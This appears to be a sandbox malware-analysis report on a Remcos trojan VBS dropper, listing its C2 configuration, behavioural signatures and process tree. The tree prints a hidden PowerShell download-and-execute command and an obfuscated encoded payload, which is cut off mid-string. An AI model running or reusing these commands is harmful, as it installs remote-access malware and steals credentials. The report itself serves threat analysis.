Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 22:37
Static task
static1
Behavioral task
behavioral1
Sample
remcos.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
remcos.vbs
Resource
win10v2004-20241007-en
General
-
Target
remcos.vbs
-
Size
563KB
-
MD5
f7c17bfb4247e64e22dd52540a4b903b
-
SHA1
368ba4d02df294fa42efee5e4f330d5e7260d0c3
-
SHA256
23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
-
SHA512
5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
-
SSDEEP
12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Extracted
remcos
RemoteHost
41.216.183.218:56792
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-I5RS8V
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/1680-235-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/628-236-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft behavioral2/memory/1596-237-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/628-236-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/1596-237-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 6 2484 powershell.exe 39 1588 powershell.exe 40 1588 powershell.exe 42 1588 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3132 powershell.exe 2484 powershell.exe 3664 powershell.exe 4588 powershell.exe 3196 powershell.exe 1132 powershell.exe 1092 powershell.exe -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral2/memory/1588-214-0x0000000007930000-0x0000000007986000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 1588 set thread context of 1596 1588 powershell.exe 126 PID 1588 set thread context of 628 1588 powershell.exe 127 PID 1588 set thread context of 1680 1588 powershell.exe 128 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.execmd.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 4484 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 2872 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2484 powershell.exe 2484 powershell.exe 3664 powershell.exe 3664 powershell.exe 4588 powershell.exe 4588 powershell.exe 3568 powershell.exe 3568 powershell.exe 3196 powershell.exe 3196 powershell.exe 516 powershell.exe 516 powershell.exe 1132 powershell.exe 1132 powershell.exe 1588 powershell.exe 1588 powershell.exe 1092 powershell.exe 1092 powershell.exe 396 powershell.exe 396 powershell.exe 3132 powershell.exe 3132 powershell.exe 1680 powershell.exe 1680 powershell.exe 1596 powershell.exe 1596 powershell.exe 1596 powershell.exe 1596 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
powershell.exepid Process 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 3664 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 2872 taskkill.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeIncreaseQuotaPrivilege 516 powershell.exe Token: SeSecurityPrivilege 516 powershell.exe Token: SeTakeOwnershipPrivilege 516 powershell.exe Token: SeLoadDriverPrivilege 516 powershell.exe Token: SeSystemProfilePrivilege 516 powershell.exe Token: SeSystemtimePrivilege 516 powershell.exe Token: SeProfSingleProcessPrivilege 516 powershell.exe Token: SeIncBasePriorityPrivilege 516 powershell.exe Token: SeCreatePagefilePrivilege 516 powershell.exe Token: SeBackupPrivilege 516 powershell.exe Token: SeRestorePrivilege 516 powershell.exe Token: SeShutdownPrivilege 516 powershell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeSystemEnvironmentPrivilege 516 powershell.exe Token: SeRemoteShutdownPrivilege 516 powershell.exe Token: SeUndockPrivilege 516 powershell.exe Token: SeManageVolumePrivilege 516 powershell.exe Token: 33 516 powershell.exe Token: 34 516 powershell.exe Token: 35 516 powershell.exe Token: 36 516 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeIncreaseQuotaPrivilege 1132 powershell.exe Token: SeSecurityPrivilege 1132 powershell.exe Token: SeTakeOwnershipPrivilege 1132 powershell.exe Token: SeLoadDriverPrivilege 1132 powershell.exe Token: SeSystemProfilePrivilege 1132 powershell.exe Token: SeSystemtimePrivilege 1132 powershell.exe Token: SeProfSingleProcessPrivilege 1132 powershell.exe Token: SeIncBasePriorityPrivilege 1132 powershell.exe Token: SeCreatePagefilePrivilege 1132 powershell.exe Token: SeBackupPrivilege 1132 powershell.exe Token: SeRestorePrivilege 1132 powershell.exe Token: SeShutdownPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeSystemEnvironmentPrivilege 1132 powershell.exe Token: SeRemoteShutdownPrivilege 1132 powershell.exe Token: SeUndockPrivilege 1132 powershell.exe Token: SeManageVolumePrivilege 1132 powershell.exe Token: 33 1132 powershell.exe Token: 34 1132 powershell.exe Token: 35 1132 powershell.exe Token: 36 1132 powershell.exe Token: SeIncreaseQuotaPrivilege 1132 powershell.exe Token: SeSecurityPrivilege 1132 powershell.exe Token: SeTakeOwnershipPrivilege 1132 powershell.exe Token: SeLoadDriverPrivilege 1132 powershell.exe Token: SeSystemProfilePrivilege 1132 powershell.exe Token: SeSystemtimePrivilege 1132 powershell.exe Token: SeProfSingleProcessPrivilege 1132 powershell.exe Token: SeIncBasePriorityPrivilege 1132 powershell.exe Token: SeCreatePagefilePrivilege 1132 powershell.exe Token: SeBackupPrivilege 1132 powershell.exe Token: SeRestorePrivilege 1132 powershell.exe Token: SeShutdownPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeSystemEnvironmentPrivilege 1132 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
WScript.exepowershell.exepowershell.execsc.execmd.execmd.exepowershell.execmd.execmd.exepowershell.exedescription pid Process procid_target PID 2256 wrote to memory of 2484 2256 WScript.exe 82 PID 2256 wrote to memory of 2484 2256 WScript.exe 82 PID 2484 wrote to memory of 3664 2484 powershell.exe 84 PID 2484 wrote to memory of 3664 2484 powershell.exe 84 PID 3664 wrote to memory of 596 3664 powershell.exe 86 PID 3664 wrote to memory of 596 3664 powershell.exe 86 PID 596 wrote to memory of 3936 596 csc.exe 87 PID 596 wrote to memory of 3936 596 csc.exe 87 PID 3664 wrote to memory of 2636 3664 powershell.exe 88 PID 3664 wrote to memory of 2636 3664 powershell.exe 88 PID 2256 wrote to memory of 2100 2256 WScript.exe 102 PID 2256 wrote to memory of 2100 2256 WScript.exe 102 PID 2100 wrote to memory of 3948 2100 cmd.exe 104 PID 2100 wrote to memory of 3948 2100 cmd.exe 104 PID 3948 wrote to memory of 4236 3948 cmd.exe 106 PID 3948 wrote to memory of 4236 3948 cmd.exe 106 PID 3948 wrote to memory of 3568 3948 cmd.exe 107 PID 3948 wrote to memory of 3568 3948 cmd.exe 107 PID 3948 wrote to memory of 3568 3948 cmd.exe 107 PID 3568 wrote to memory of 3196 3568 powershell.exe 108 PID 3568 wrote to memory of 3196 3568 powershell.exe 108 PID 3568 wrote to memory of 3196 3568 powershell.exe 108 PID 3568 wrote to memory of 516 3568 powershell.exe 109 PID 3568 wrote to memory of 516 3568 powershell.exe 109 PID 3568 wrote to memory of 516 3568 powershell.exe 109 PID 3568 wrote to memory of 1132 3568 powershell.exe 112 PID 3568 wrote to memory of 1132 3568 powershell.exe 112 PID 3568 wrote to memory of 1132 3568 powershell.exe 112 PID 3568 wrote to memory of 3092 3568 powershell.exe 114 PID 3568 wrote to memory of 3092 3568 powershell.exe 114 PID 3568 wrote to memory of 3092 3568 powershell.exe 114 PID 3092 wrote to memory of 356 3092 cmd.exe 116 PID 3092 wrote to memory of 356 3092 cmd.exe 116 PID 3092 wrote to memory of 356 3092 cmd.exe 116 PID 356 wrote to memory of 2544 356 cmd.exe 118 PID 356 wrote to memory of 2544 356 cmd.exe 118 PID 356 wrote to memory of 2544 356 cmd.exe 118 PID 356 wrote to memory of 1588 356 cmd.exe 119 PID 356 wrote to memory of 1588 356 cmd.exe 119 PID 356 wrote to memory of 1588 356 cmd.exe 119 PID 1588 wrote to memory of 1092 1588 powershell.exe 120 PID 1588 wrote to memory of 1092 1588 powershell.exe 120 PID 1588 wrote to memory of 1092 1588 powershell.exe 120 PID 3948 wrote to memory of 4484 3948 cmd.exe 121 PID 3948 wrote to memory of 4484 3948 cmd.exe 121 PID 1588 wrote to memory of 396 1588 powershell.exe 122 PID 1588 wrote to memory of 396 1588 powershell.exe 122 PID 1588 wrote to memory of 396 1588 powershell.exe 122 PID 1588 wrote to memory of 3132 1588 powershell.exe 124 PID 1588 wrote to memory of 3132 1588 powershell.exe 124 PID 1588 wrote to memory of 3132 1588 powershell.exe 124 PID 1588 wrote to memory of 1596 1588 powershell.exe 126 PID 1588 wrote to memory of 1596 1588 powershell.exe 126 PID 1588 wrote to memory of 1596 1588 powershell.exe 126 PID 1588 wrote to memory of 1596 1588 powershell.exe 126 PID 1588 wrote to memory of 628 1588 powershell.exe 127 PID 1588 wrote to memory of 628 1588 powershell.exe 127 PID 1588 wrote to memory of 628 1588 powershell.exe 127 PID 1588 wrote to memory of 628 1588 powershell.exe 127 PID 1588 wrote to memory of 1680 1588 powershell.exe 128 PID 1588 wrote to memory of 1680 1588 powershell.exe 128 PID 1588 wrote to memory of 1680 1588 powershell.exe 128 PID 1588 wrote to memory of 1680 1588 powershell.exe 128
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\remcos.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand 
         $ n m g b K c Y H   =   9 5 1 5 
         $ l b L E n E C H   =   ( [ M a t h ] : : S q r t ( $ s G h k O T i b )   *   1 1 ) . T o S t r i n g ( ) 
         $ f l G k x Q q K   =   " f " 
         $ J r J U Y c v g   =   " d " 
         $ x r e V E W C x   =   " N " 
         $ a N y A n S r R   =   " G " 
         $ d i u e t L A r   =   " d " 
         $ n n i o E t S r   =   " J " 
         $ D i O t R b H F   =   " S " 
         $ M p u k w P U j   =   " G " 
         $ O e k N Y e e Z   =   " c " 
         $ h k z I x L G l   =   " B " 
         $ K a i s Y V t N   =   " 3 " 
         $ J B w Z Z o w m   =   " Z " 
         $ E g O m q J z Q   =   " i " 
         $ i A p U x r j p   =   " c " 
         $ L f o s Q L m Y   =   " M " 
         $ p t p f G a Z D   =   " 9 " 
         $ t 1   =   6 4   +   5 6 
         $ t 2   =   ( $ t 1   *   6 )   -   ( $ t 1   /   7 ) 
         $ t 3   =   " f "   +   " d "   +   " N "   +   " G "   +   " d " 
         $ t 4   =   " J "   +   " S "   +   " G "   +   " c "   +   " B " 
         $ t 5   =   " 3 "   +   " Z "   +   " i "   +   " c "   +   " M "   +   " 9 " 
         $ p   =   $ t 3   +   $ t 4   +   $ t 5 
         $ a   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ p ) 
         $ d   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " Q V Q V A T d x E f F V s T 3 J N X L d 4 g W M + T A o E Z b q 5 f v K C 6 x z R s w C 0 9 f + R 3 n 5 5 6 9 Q 2 u h 7 Q w a s P I g 1 O k C g Q w J M d E q Y D 7 Y s V h 0 g l a t 7 x U F O K Z p 9 B d p v E w n J S h O M W i 0 v w u j A g v 4 D O + Y Y f b L Q i 9 L c i b N 5 v g Q c D 0 I R t 5 6 A w J C T 8 v 8 W t h 8 i t S z + V k H 6 D 8 A F r 9 Y q m + p O K u c V + c J r E 7 1 K 0 e y k 2 E d O H a z P t I E f + q v J i K j g D E F G o + m K r U z 2 k L h 1 V s k S o t R H b Z / T v K D I u 8 X x G + q E u R 2 U a V 8 L M s z N r C d V W Q K y + 0 K j e S 7 A 2 4 u B b c w H 7 c + / G 8 D d c i B N + N Z q p X 5 T g c i s 5 4 j W L K P E Y J R M y 3 m U Y n D G Y 7 K p H o 6 N b 7 l 0 5 j p i B a m 3 v y P c x j I V H 5 F f C 3 a f P w 2 b 7 L x z K X L U H n / L O q w I L d j y t x F P p f m B p I h c g k M m C 3 Z 4 c f w M 0 k 5 w E d Z P 5 c P M 1 + 2 E o R B n c z u j z G F Y 0 F C a b k Z E n V f j 5 e 8 P D b 2 M J I i B T h W S b Z V 5 q 8 n / g j A q / o 9 n y 9 O I V P C D d s s j 5 c y A s t S Y R J n k J 5 9 r s f 2 A Z m i Q 9 f t 1 a d I C 9 m W N e X 8 I 4 P V 8 U d x P W v u Z X 5 E e D M n Q 3 6 l l S e c I T X Q R C U u 1 M e v u f 2 Y V a W t C W 8 M H n p f l 4 5 H D t F S L v y 1 Z U p 2 f W F s y J f / Z f K 8 G O N M N n G x D q 2 6 U F / 0 n W B S f d C 5 d P W 0 4 r J N Q N V g d S K n 8 I C T l y U 3 M M 2 / t j Q y B C K M G X m 4 k Q q r 6 7 O H n Q A H H q Q 0 x 2 Z 6 1 F 4 2 j V e V t n c j c 7 P 2 k a K c o U e I z J F X S S u G z o f r z G 1 z b Z 9 5 r u 6 l 7 P r d N 5 2 i N l F + K A P F I k D w Q R v A Q j s 2 S 9 m H 1 2 J D k B I o p b w L z g 0 x 1 W y T l q 4 i N s w J X y K q o Q d X Y W x o A s 5 E X 9 O y A A 7 d J y 2 A o z F f m k a U 0 M v J / 2 4 9 E Q y u x m I v c 1 A i V n M 8 b K o D J r 6 w + Q l o z O f + P H W f q T h R n 3 Z n u S L Q a 6 I 3 Y i k i 4 L I j k q x 5 7 L a g 5 4 j i k M S u 8 r E m a 4 z o x v k S 6 c D 0 G P C a 1 j g S E q J 4 F c K 0 S + / M W 7 w V N u D C d Y 0 k m k A q x C 0 g 8 3 c C 9 j P M a f E m 7 t R c 3 Q A z F T a f 0 v r U n A + r F m Y g u k C C s a 5 d O q D C 9 R A l b Q M f G R W S x D o + E 8 8 R 9 8 E 4 C V W 6 k K u F q l z x E D F o B E y S 0 s P 2 i p 5 p G E J 9 U s C j F n Y V H g L 4 B 2 L V e / t w u y D o A y y E s T G l U x + 3 4 L g o y f E C s s Y z k Y 5 4 B Q h J I P u a 1 a k F F 7 a 3 B F C b j t r j s L 7 o Q t S a o x u U u V r T + s y Z Y M Z m W E B 6 H Z g W E 4 I K J 4 N I I f 6 z W U D O q K D Y v 6 8 g g S q m t 4 5 e 3 Y 9 4 B 0 + N B T Q i Q X 2 d x i / B V p L w q q b q S B c c g c c K G 4 y t f v 7 m + r n w o U p S Y 8 P h p X / 0 + n G X H y K 4 p S I R h G 2 F Z 3 + T t S H Q D I Y s S 1 e R d l n o l E 3 e Z z s o T V 7 N Y p p T A R M c O 7 n U V / 9 O / 9 n k Y 6 w h Z w c t A N n T U y a p d O 3 / d / i G 5 V g K Z D W Y 8 T 7 P i V P P U j Q 7 U V o c b 8 h 5 Z c M J 3 1 2 R / G + H W 2 Z t 7 b X G f j z y N H I y 1 r Y y j R Z W q 4 q d V j s I P l P Y 1 s Z u W E U o 9 W s / A p A F y Y x 0 h u 5 2 z G v 6 W 0 P 2 J J 1 m 4 c O x P / q M D t O 4 8 2 x u c I r j A N J g C A T R n F X R h B S J 6 j / 5 j 9 4 z + T g X l C y u C N 1 A O Q 4 Q z N Z w w H X C A g n L J W A T E w o J k I 7 p Q S T A N 2 h + x H T e D E J p f 4 1 j 2 V B J z H I q m A 3 T p o O I s I F w 7 s / u s y W k k N q G C T b C y f F 2 n R S d P p A 7 D I i A x x 0 0 k 1 Y q M S r E S g j A n p R o 2 q N h Z 7 t R 5 K Y e e i D 2 8 j a G 0 k + K k 6 G y 8 m v 6 j L 2 t p S t V v 7 F 3 V c H 9 v C B m t R m w f Y 4 T C P m f h t d h k G W A l E Y V Q / t t H c q 6 v v i E c j o 1 9 R d 8 t D b f o D y J l B g Q G c c k S C m X B S u a Q Q c K r C u B l / n Z E q M s Y R I Q Y 9 u z e 1 M q 7 b f M F U J p b a m 1 d w a 5 G g Q m c V b J / u u O w x g 7 w Q g + q A r / J 5 z 4 d V R g 1 G 8 t n y s 0 m j d i c D 0 M S p y 7 W 2 K d C x I x e i I y T f I u X l S 9 Z U 9 N 1 i q 4 e t S 9 1 b t l + Y o L o A + B Y u H j c f o L l d s 0 P X k M z 2 / c x A f P Z Y 3 6 A J y P U K 3 5 k i X j / j 2 J E Y J A f 9 O l b M l 5 o T f a / k 0 k s C W Q 6 + a 7 + S E F r j C 0 r L 8 + H v e p Q G E 7 u R e Z s Q C Y 6 f z J l P B o F U / g / q Q k k d Z a C g r s N n S N y g Q H k 5 j b q Y R a Q w m X j w K U D 7 4 p z J 0 d V C T I k F e n D 3 r U x U O 2 0 A U g r w Z D n 5 C g m l H Y x a K 2 5 H 3 a i u R L J A K Q z n L C 5 X W L A C T X C i 8 k M 5 n 7 / y 8 j d j p e b F z v X a + F k w 1 + T R O 5 Q Q + F 2 x c T A 4 S b m + C 4 x R n M f m F D L G N J L n k / f O I a 6 J J g f o e i P d M K n 2 T i q Q 4 w e F o U G f 7 s w o c N Q J c 8 t u 2 + z O S d 4 e Y J c M A s q M u n v p B G O X g i N J n C 8 i 4 O U C l K 9 a U h F V B A 1 S 8 t T I c I h N h s L Q S T Z n R Y / c u z + o x K 5 u I F R u i z 1 J Q G E 9 8 f x Y y K n w d u U f X K g L 3 X h b 4 m H L 5 w 6 X j 6 k 2 M Z M i H t Z 5 H k G W r 7 6 F d G 0 Y P 9 K E i Q 4 t V D Q + 2 q w 5 c g h 4 y a u h a t 6 O S 0 f W d J c S R S J N P 6 n 1 D 2 V T L Q m 5 L I Z E C d p A + o p H q o 7 / + A u R K M W H c O K g w K u n N Z 1 x A x 6 c G Y z U 9 y p T a y s z g P L h w M 4 R a 5 4 1 9 0 n 5 p p i C y a s j t P a K x 0 s 0 A p c d 2 2 s m 4 w Z 1 7 E B c I p r J x 0 G x Z 3 T k F q 2 p + Q C 3 3 G C 3 B 1 a M a O A O 3 n v / m n h X O i C 4 j i r b n l q f e k E Q 0 K x U X U u h / j / I a j l G c z V i J r 3 1 b h q A v N T T 9 Q L E 0 w h Z c r X 8 1 + o g J I D R 5 t P P g j 0 k j M g h + g 0 9 K p Z o 9 P i G 8 j m J n b X o H J T D l g m O n C V W l y L x q F E h 2 d j v J i o N d V F e s o k 0 D Z F + g T m Z h d o 3 s O q d r U w y P a S 8 M / O g L Z i D 6 Z r 8 Y n G g M L G 5 l F 0 A 3 p s I f r N a F 5 + X R 5 K f + 8 5 n i 1 J x 2 B O I H + 1 I R w b a 6 m d 8 G T 9 I e y 8 K G d p r Q q J o 8 6 V X B L 4 4 3 t 3 B T f I 9 F r J z 4 X / x l o X x s K k W D e 4 / R 6 j + C Y w b P L m W 9 k J q P C r j 2 e o 1 d q 1 e G f I i I v n 1 I E 5 m f a 4 z q L x 8 v t i J t S S l / e 3 D j n N u N B W s F 2 O X u N J F z I 1 G T v F u C / C e N 8 1 Y m 7 A O T Z Z J e j s f P S K o j F h h 5 Q c 9 Q 7 k t T g b r x L W L W 9 n h e y a H y w I x Q o S X I V W O I f + p T U l P J X C T x Y u m Q 4 A b n F g c 9 + t P r Z 5 b / d 9 H z J X I 7 c m 2 Z 8 Y b a p c H e Y S Q z E n I g 8 h l X D Z I 0 1 5 e r J u P z r Y k 7 z 6 s O 3 M u y a Y 4 h n O W L i T z w x y D o I 3 / b F E H h g t y 7 O t N K J Z V 5 k W 4 j v h O / K A 0 A m s l l y k p j u v E Y L 0 f 2 a V B w p K s 9 Y J t J M C Z C 7 / U s S w 9 q F R e a p W g M 8 2 6 w i 9 8 n 5 p Z d B M Z D F y h x p l U Y K Z D u k 2 e H 9 h i 8 1 k g S V m a s w 2 I 0 6 k H D P f V A 8 c n G T J 6 s 0 y P H 5 r n K Z v g H / K F g z 1 b 3 J S P b V q + 5 c / P Z p R v 2 m K a Q B b P + g e q h R k B j m d 5 V F 2 C w S C A i / 2 F T C H g o p B t 7 O l A 8 l c q b L P i 7 Z b E O R q B 1 y r o L t w 2 X 7 Q U Z H C V W R G 2 J u 0 G u B P I S W i h a Q 5 F T + T F q n F N V Y a x M E 1 d v R c n y R i f 8 G r v Q O J h 3 1 w 9 R d J 7 y t S / I B H Y q e u 7 / W N l F e v w U 6 r k T T e v i m 8 v i W 9 s A G p 0 8 s + B L b e 5 + y g 3 m j w Q G L 9 r y h A P N Y C a M i Y 8 t A p I 3 E X H 1 r L 2 1 H U z G g T h w p s b F A U 2 n c 9 X 5 g 9 L 3 l 7 t 9 U s q P l X o Y A F n e S D y h k Z R m O 1 j B f b 3 I I k t T A n p j Z v i 4 O a u n / o k 6 k a u H t y q N 9 t 6 U Y o O R B c d H p K W A d X 3 X U m K X J + E + 6 L R z 9 P M E t V i P i A M h i I Y k T x g n 0 K u q s w K I C k n o p s l X f 6 p D s i R 4 v 1 O 0 j e t j B A G z 6 Y O z x + i o l X A I I F o I X k z u t / u Q 4 J e i 3 g E t B P / U A B B p D c 2 u y d z o S 6 Y U Q w d K W k l b O x Z G P M O z B y x 7 I P c B Y D C 5 Y 0 6 D X u V 9 R O l 5 F L l K x D q U a 6 V U G A o f j Q c W Q 2 X i b T E R L i t o W a c V V B 1 9 6 a A G 6 v 8 U b G n 1 b e Y I 7 A a a p I f f 7 M 7 P X f G I S e 6 a Z H 5 0 e I K B i N T b P l v + r P 3 m G H 7 x T I 4 b T c t 5 f k S p 5 A V O f u t B t h i y s W e T / 0 G A j J V z x 3 B k i R m f t B 0 I P 8 2 m N T r A a M z D B E i Q c l d c M U m a O j V 0 Q u 3 + S m V Q O F + j P i E 5 F J + 3 c p z i X Z o v M + s / b h U 4 N b F s q G z o u o Q G g n k G 8 B I B k g l p f 1 O T 3 C 8 0 y 7 c D n Q H 7 k M 3 Q u W H L E e Z R J w F n T / G Q 4 N I m s e w w v s t R l A c C j g d S D j 4 / o 0 W v s 5 o M 3 Z 7 B D d 7 L g W 6 D c r 4 C d n k f Q I a O C 0 k M K V s U V n r g a J A v z 8 8 a C j 8 M I t F l G 1 j t U L m K 2 8 B o q 8 i n j 1 G l B u z J X q 0 o 2 v f E I 2 r 0 I r D s v G z x I i E L K S N 9 / r O 8 1 B i I U j S D i a G 7 f H H + c d b R g u o 2 N R 2 w N S O o D Y W D T G U I j R f r D w i F Z d x j w v u F p + 3 c W n l 0 e M v x P + R 9 L l L c U c Y h x R O I G Q I t G v S x B M z 4 7 O 8 C J / d 0 0 F P d e P p u E G 9 6 W y u G V e b n G q i k O i k Q C f A C p w 3 c H V V m n L o 4 R N R D E 2 e o W q E p + 5 c Q / t H o K T P k R n Y k V U x r U k P x T / p Y m F 2 d P k N A N 1 V 2 d R f a l S 2 e N x g z Q s v F u S a 0 b p u x 8 l R M 6 I y e 7 K e V r f 8 P K 8 b X B 0 C E 3 A X p M 1 g V C Q 3 f 0 v I 7 e K Z M z T 0 m k V o Z + x 8 4 8 4 f I R x c o e R + g V i 7 c f y O z v N K z Z 1 8 M j E e 3 H Y 6 g A 3 n 1 9 e G b 1 N W N Q X O H j l M V Z g b G C V I e D S W k w + e s x g 3 8 s k H D B w T e Z Y 5 d / O V 2 a P e 0 4 d d B C 9 4 y k x o s E s s u X h v u w B v 4 U j 0 O B d x k 7 b M L + G Y T y r + E 9 0 Q x r g 4 X K R T N b T r 1 O m E T h S N 8 N P M Y 0 2 3 j k s P k 8 o T n A L 1 c Q F Z T + p s h k y b n P j Z p K 2 p B P j t y L J o X 8 3 r S b R A K M a P K V r J Y f / o q p / 2 + T i l k X T 7 k Q T W c o w j k s L f i c W 3 M / v 9 3 r t 4 w D G j G X l w J A u e U / x Y y S B z 5 u s X H J I G 8 j q 5 N 7 a 0 i S s o k w I K f N e 2 F J w k K z 6 s S t H Y f 5 N j + D u i P q 3 V f c K P G g l S d b M l B 7 2 H 5 a O O a X X U c c 6 S n j N / b a 3 C + e x T h R T s a 4 2 s h v X 0 c g W 6 5 4 7 y 2 H c O H x M Y u p z b S D 1 X F i L 0 X r B x S R O N K e Q P 9 i U E X l 0 w u 2 u y M B V p t B Q 6 Q + g U P U f i P u A i R O O O p h 0 B + S 4 M b v P o Y f f C S 1 1 U H 2 2 R D K Q k g 9 8 5 0 R 7 H s j l r c c c H v o + 1 Z n F / 7 j V K T 3 9 X z 0 S j P h W c Y T J C R Z D d o C U v w b Q P v o k B A B 7 s 0 O K d x e T a u Q k X j N b V b u k i g Z j Z C G N Z z n I / B f j p s W J q O G K d F o m p w u j 6 O S R 8 y / H Z Z v f a r u A Q M D O x Z D P j a W W q O Z r 